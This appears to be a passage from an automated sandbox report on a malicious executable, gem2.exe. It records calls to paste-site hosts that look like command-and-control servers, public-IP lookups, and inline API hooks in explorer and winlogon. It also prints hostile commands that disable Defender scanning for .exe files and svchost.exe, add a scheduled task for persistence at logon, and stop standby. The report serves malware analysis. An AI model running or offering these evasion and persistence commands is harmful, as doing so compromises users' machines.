                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o%2F0d5feoSqZzLDCwwxYpL0ispsiVy0dFoN0AQD9mrhrBwyvtBpWNcKwkA56%2B53o0xBEdDw7wFEy2DggOPeZ6Q7lyp5CJta7E46RqB%2BI7ztsxP1ipLqsHwIGEO1g2bGuZ"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc47588634314-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1650&min_rtt=1650&rtt_var=825&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                              142         192.168.2.7  50392        172.67.176.186  80                7628  C:\Windows\System32\svchost.exe
                                                              Timestamp                            Bytes transferred  Direction  Data
                                                              Jan 12, 2025 09:27:27.032485962 CET  87                 OUT        HEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:27.488215923 CET  867                IN         HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:27 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:27 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lsMiMSUaKni8vzRXxZz2KX7AdvQHk71hbFLxZJImKwy85dsJHecmOJqeNNHgKqInv7TbV%2BGng70ROd0WDjfK3B4041E4LTrr8WdiZFD9jZ3Diqg0fn7jlPD4Ru7IeFjucNeu"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc478788b4339-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1603&min_rtt=1603&rtt_var=801&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                              143         192.168.2.7  50394        188.114.97.3    80                7628  C:\Windows\System32\svchost.exe
                                                              Timestamp                            Bytes transferred  Direction  Data
                                                              Jan 12, 2025 09:27:27.379749060 CET  86                 OUT        HEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:27:27.852879047 CET  878                IN         HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:27 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:27 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G0Y5hkz2FitN%2B%2FCf2juUCGvncHNlQjJD3YF2RtZuv6kY76P0JDWJw6tdkCfdOs9%2FH2wRPuhshQ1ZcF9Vkbq5u94zNgtSys1rxHX%2B%2Bbk802%2BCg1RvHOlVyU7BjTDrsuZC1U0%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc47abbf48c33-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1888&min_rtt=1888&rtt_var=944&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                              144         192.168.2.7  50396        104.21.64.1     80                7628  C:\Windows\System32\svchost.exe
                                                              Timestamp                            Bytes transferred  Direction  Data
                                                              Jan 12, 2025 09:27:27.494734049 CET  91                 OUT        HEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:27:27.941625118 CET  877                IN         HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:27 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:27 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0qJXRNvLgfFgrLUO%2FDN4rx6NKU9cpzcZfbwBeqVLSUqWRHXd%2Bd7ldSHB3ucDoJoZH9VRMVDCHI0%2BMHSEeQcNUphbVwP3fDFriA9iHfKAgi5s%2BEtuYRc810x1RAvTP6dnFEL8"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc47b5fdc7c6a-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1942&min_rtt=1942&rtt_var=971&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                              145         192.168.2.7  50398        172.67.198.113  80                7628  C:\Windows\System32\svchost.exe
                                                              Timestamp                            Bytes transferred  Direction  Data
                                                              Jan 12, 2025 09:27:27.859731913 CET  80                 OUT        HEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:28.325730085 CET  864                IN         HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:28 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:28 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3wD9v6Ax8SJIQ757D6rC68M0pgIK6Cc3y2Khq4vxg6OPurIhp2%2FonMEsRN6cOQ%2F6020hmWfAHZLYZe10T%2BWVN%2ByCYaAp93PDCzEUqf4v2uyIubRoQfkHs5%2BNVvtfUlPx"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc47dac804258-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1892&min_rtt=1892&rtt_var=946&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                              146         192.168.2.7  50403        172.67.176.186  80                7628  C:\Windows\System32\svchost.exe
                                                              Timestamp                            Bytes transferred  Direction  Data
                                                              Jan 12, 2025 09:27:28.335030079 CET  87                 OUT        HEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:28.793081999 CET  877                IN         HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:28 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:28 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pnckGmeXwpnAOmIHBfJofuOJNV2yI5T%2F17FD%2Bm5SafNbnKox4BfUfAxCB%2Be%2BqoSFcHGiQuJ3%2BAIbjzG%2F7ZmVqpufCXMrmkLFBIR6xGA7rhWYwhCZMYFwd6LhvQTRnYiPBEzb"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc4809cad426b-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1735&min_rtt=1735&rtt_var=867&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                              147         192.168.2.7  50405        188.114.97.3    80                7628  C:\Windows\System32\svchost.exe
                                                              Timestamp                            Bytes transferred  Direction  Data
                                                              Jan 12, 2025 09:27:28.429495096 CET  86                 OUT        HEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:27:28.911421061 CET  872                IN         HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:28 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:28 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C104iSGBORZwaxnmdbbY%2BXiZml6vlO%2FxQIOYgLvCHdF6K1Xjuyz9dKUzakmTuONNOP20TKjydBnRJdCIen0Y13wu9cgy0enSIKzwqecPFcifdZ2YKG5PNarYY180qtBpK%2F4%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc4815c99efa5-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1968&min_rtt=1968&rtt_var=984&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=210&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              148192.168.2.750407104.21.64.1807628C:\Windows\System32\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 12, 2025 09:27:28.799590111 CET91OUTHEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:27:29.259738922 CET | 877 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:29 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:29 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ctwUOpPA7dEcUcqQuf3%2BZvZjpwNRxH5W03rIFtRAp%2Fno0P0D9PxypmcdpsK03HOFep7boIhlHrlC3ce%2F%2FWcwLAmDw6e79B9rzR1SCpfj7SG8228it8rZQGEQEmYS3CsSizBN"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc4838897c358-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1666&min_rtt=1666&rtt_var=833&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=153&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              149 | 192.168.2.7 | 50409 | 172.67.198.113 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:28.918548107 CET | 80 | OUT | HEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:29.373922110 CET | 862 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:29 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:29 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DkG6oBmvndZOfjJZRqYHT25rFuTkutHBSEs8A1TZJAk3Mw6Q1DxBhMe7%2B8UIZTEjdDTBFwl1%2BNFWxtDBeULiqjog%2FSet75UOxZmhU%2BCP5IZ4PQqPKIGMgg2tiQMskirK"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc4843a7d43b8-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1772&min_rtt=1772&rtt_var=886&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              0 | 192.168.2.7 | 49702 | 104.21.60.172 | 443 | 2692 | C:\Users\user\Desktop\gem2.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-12 08:26:20 UTC | 110 | OUT | GET /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              User-Agent: URL Checker
                                                              Host: pastesnap.com
                                                              Cache-Control: no-cache
                                                              2025-01-12 08:26:20 UTC | 925 | IN | HTTP/1.1 200 OK
                                                              Date: Sun, 12 Jan 2025 08:26:20 GMT
                                                              Content-Type: text/plain
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Last-Modified: Sat, 11 Jan 2025 00:57:39 GMT
                                                              ETag: W/"804395cfc363db1:0"
                                                              Vary: Accept-Encoding
                                                              X-Powered-By: ASP.NET
                                                              X-Powered-By-Plesk: PleskWin
                                                              cf-cache-status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aLRj8%2FeF%2FjAIk7mJ5mmESpxdbP8ZfImkQBbj3MlabWh6fQn5V26oFWHOA8qmKwhFaN%2Bu1YSTOmc737sQclqIazTNdXxzykQIS%2BDN22otu48HLS%2BC2AhuPVfHJS%2FdWVF0"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc2d75ecd0cb4-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1606&min_rtt=1604&rtt_var=607&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=748&delivery_rate=1795817&cwnd=245&unsent_bytes=0&cid=721699ad11dd7434&ts=1129&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              1 | 192.168.2.7 | 49727 | 104.21.60.172 | 443 | 2692 | C:\Users\user\Desktop\gem2.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-12 08:26:24 UTC | 110 | OUT | GET /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              User-Agent: MyUserAgent
                                                              Host: pastesnap.com
                                                              Cache-Control: no-cache
                                                              2025-01-12 08:26:24 UTC | 916 | IN | HTTP/1.1 200 OK
                                                              Date: Sun, 12 Jan 2025 08:26:24 GMT
                                                              Content-Type: text/plain
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Last-Modified: Sat, 11 Jan 2025 00:57:39 GMT
                                                              ETag: W/"804395cfc363db1:0"
                                                              Vary: Accept-Encoding
                                                              X-Powered-By: ASP.NET
                                                              X-Powered-By-Plesk: PleskWin
                                                              cf-cache-status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5TDU4N4RSbVU4mP%2FD4u71qpe1bOlKiPgvz6CnZPGaUaKBiuq1WHg5eww5pH4tvrwvWRjFfM3QBeMlQct1VBMWg6OpLX4kioAvkxybDAzblAb%2FGg8IVs7GTb8btMw9y6b"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc2ecfed30f6d-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1522&min_rtt=1510&rtt_var=592&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=748&delivery_rate=1810291&cwnd=239&unsent_bytes=0&cid=7756634a8c4387b5&ts=722&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              2 | 192.168.2.7 | 49774 | 104.21.60.172 | 443 | 2692 | C:\Users\user\Desktop\gem2.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-12 08:26:31 UTC | 110 | OUT | GET /STB/cGFzdGVzbmFwR.txt HTTP/1.1
                                                              User-Agent: MyUserAgent
                                                              Host: pastesnap.com
                                                              Cache-Control: no-cache
                                                              2025-01-12 08:26:32 UTC | 922 | IN | HTTP/1.1 200 OK
                                                              Date: Sun, 12 Jan 2025 08:26:32 GMT
                                                              Content-Type: text/plain
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Last-Modified: Mon, 30 Dec 2024 22:25:18 GMT
                                                              ETag: W/"01b94b495bdb1:0"
                                                              Vary: Accept-Encoding
                                                              X-Powered-By: ASP.NET
                                                              X-Powered-By-Plesk: PleskWin
                                                              cf-cache-status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XPpAu3BlDBteC%2FOmOPArMok1%2Bag4MfunF7ReTDxuu7H28UlZaR8jVoc%2FQ8%2Fr7g9%2FOUxfric4gHPyCmxRkbpyozv4QbUjXsJbWyzNvs6PaqbYlac%2B6BaGm59S8XSBKrdL"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc31dc9e5433d-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1697&min_rtt=1694&rtt_var=641&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=748&delivery_rate=1698662&cwnd=252&unsent_bytes=0&cid=c3aa89f02728970f&ts=373&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              3 | 192.168.2.7 | 49847 | 104.26.12.205 | 443 | 2236 | C:\Windows\System32\curl.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2025-01-12 08:26:42 UTC | 77 | OUT | GET / HTTP/1.1
                                                              Host: api.ipify.org
                                                              User-Agent: curl/7.83.1
                                                              Accept: */*
                                                              2025-01-12 08:26:42 UTC | 424 | IN | HTTP/1.1 200 OK
                                                              Date: Sun, 12 Jan 2025 08:26:42 GMT
                                                              Content-Type: text/plain
                                                              Content-Length: 12
                                                              Connection: close
                                                              Vary: Origin
                                                              CF-Cache-Status: DYNAMIC
                                                              Server: cloudflare
                                                              CF-RAY: 900bc360aec68c96-EWR
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2022&min_rtt=2018&rtt_var=765&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2819&recv_bytes=715&delivery_rate=1422308&cwnd=188&unsent_bytes=0&cid=dce4ff62d10081ba&ts=156&x=0"
                                                              2025-01-12 08:26:42 UTC | 12 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                              Data Ascii: 8.46.123.189


                                                              Code Manipulations

                                                              Function Name | Hook Type | Active in Processes
                                                              ZwEnumerateKey | INLINE | explorer.exe, winlogon.exe
                                                              NtQuerySystemInformation | INLINE | explorer.exe, winlogon.exe
                                                              ZwResumeThread | INLINE | explorer.exe, winlogon.exe
                                                              NtDeviceIoControlFile | INLINE | explorer.exe, winlogon.exe
                                                              ZwDeviceIoControlFile | INLINE | explorer.exe, winlogon.exe
                                                              NtEnumerateKey | INLINE | explorer.exe, winlogon.exe
                                                              NtQueryDirectoryFile | INLINE | explorer.exe, winlogon.exe
                                                              ZwEnumerateValueKey | INLINE | explorer.exe, winlogon.exe
                                                              ZwQuerySystemInformation | INLINE | explorer.exe, winlogon.exe
                                                              NtResumeThread | INLINE | explorer.exe, winlogon.exe
                                                              RtlGetNativeSystemInformation | INLINE | explorer.exe, winlogon.exe
                                                              NtQueryDirectoryFileEx | INLINE | explorer.exe, winlogon.exe
                                                              NtEnumerateValueKey | INLINE | explorer.exe, winlogon.exe
                                                              ZwQueryDirectoryFileEx | INLINE | explorer.exe, winlogon.exe
                                                              ZwQueryDirectoryFile | INLINE | explorer.exe, winlogon.exe
                                                              Function Name | Hook Type | New Data
                                                              ZwEnumerateKey | INLINE | 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                              NtQuerySystemInformation | INLINE | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                              ZwResumeThread | INLINE | 0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                              NtDeviceIoControlFile | INLINE | 0xE9 0x90 0x03 0x33 0x34 0x4F
                                                              ZwDeviceIoControlFile | INLINE | 0xE9 0x90 0x03 0x33 0x34 0x4F
                                                              NtEnumerateKey | INLINE | 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                              NtQueryDirectoryFile | INLINE | 0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                              ZwEnumerateValueKey | INLINE | 0xE9 0x90 0x03 0x33 0x31 0x1F
                                                              ZwQuerySystemInformation | INLINE | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                              NtResumeThread | INLINE | 0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                              RtlGetNativeSystemInformation | INLINE | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                              NtQueryDirectoryFileEx | INLINE | 0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                              NtEnumerateValueKey | INLINE | 0xE9 0x90 0x03 0x33 0x31 0x1F
                                                              ZwQueryDirectoryFileEx | INLINE | 0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                              ZwQueryDirectoryFile | INLINE | 0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                                                              Target ID:0
                                                              Start time:03:26:13
                                                              Start date:12/01/2025
                                                              Path:C:\Users\user\Desktop\gem2.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Users\user\Desktop\gem2.exe"
                                                              Imagebase:0x7ff7cf280000
                                                              File size:538'624 bytes
                                                              MD5 hash:BE89D598CD96443479C02B022FF70532
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:1
                                                              Start time:03:26:13
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:powershell.exe -Command "Add-MpPreference -ExclusionExtension '.exe'; Add-MpPreference -ExclusionProcess 'svchost.exe'"
                                                              Imagebase:0x7ff741d30000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:2
                                                              Start time:03:26:13
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff75da10000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:9
                                                              Start time:03:26:17
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                              Imagebase:0x7ff7fb730000
                                                              File size:496'640 bytes
                                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                              Has elevated privileges:true
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:12
                                                              Start time:03:26:19
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\schtasks.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:SCHTASKS /CREATE /TN "System-f4855f59e0" /TR "C:\Windows\System32\System-f4855f59e0.exe" /SC ONLOGON /RL HIGHEST /F
                                                              Imagebase:0x7ff727440000
                                                              File size:235'008 bytes
                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:13
                                                              Start time:03:26:20
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff75da10000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:14
                                                              Start time:03:26:20
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\System-f4855f59e0.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\System32\System-f4855f59e0.exe
                                                              Imagebase:0x7ff6a54a0000
                                                              File size:538'624 bytes
                                                              MD5 hash:BE89D598CD96443479C02B022FF70532
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Antivirus matches:
                                                              • Detection: 100%, Joe Sandbox ML
                                                              • Detection: 53%, ReversingLabs
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:16
                                                              Start time:03:26:30
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\svchost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\System32\svchost.exe
                                                              Imagebase:0x7ff7b4ee0000
                                                              File size:55'320 bytes
                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:false

                                                              Target ID:17
                                                              Start time:03:26:31
                                                              Start date:12/01/2025
                                                              Path:C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe"
                                                              Imagebase:0x7ff7d1630000
                                                              File size:538'624 bytes
                                                              MD5 hash:BE89D598CD96443479C02B022FF70532
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Antivirus matches:
                                                              • Detection: 100%, Joe Sandbox ML
                                                              • Detection: 53%, ReversingLabs
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:18
                                                              Start time:03:26:31
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\powercfg.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:powercfg -change standby-timeout-ac 0
                                                              Imagebase:0x7ff751f60000
                                                              File size:96'256 bytes
                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate
                                                              Has exited:true

                                                              Target ID:19
                                                              Start time:03:26:31
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\powercfg.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:powercfg -change monitor-timeout-ac 0
                                                              Imagebase:0x7ff751f60000
                                                              File size:96'256 bytes
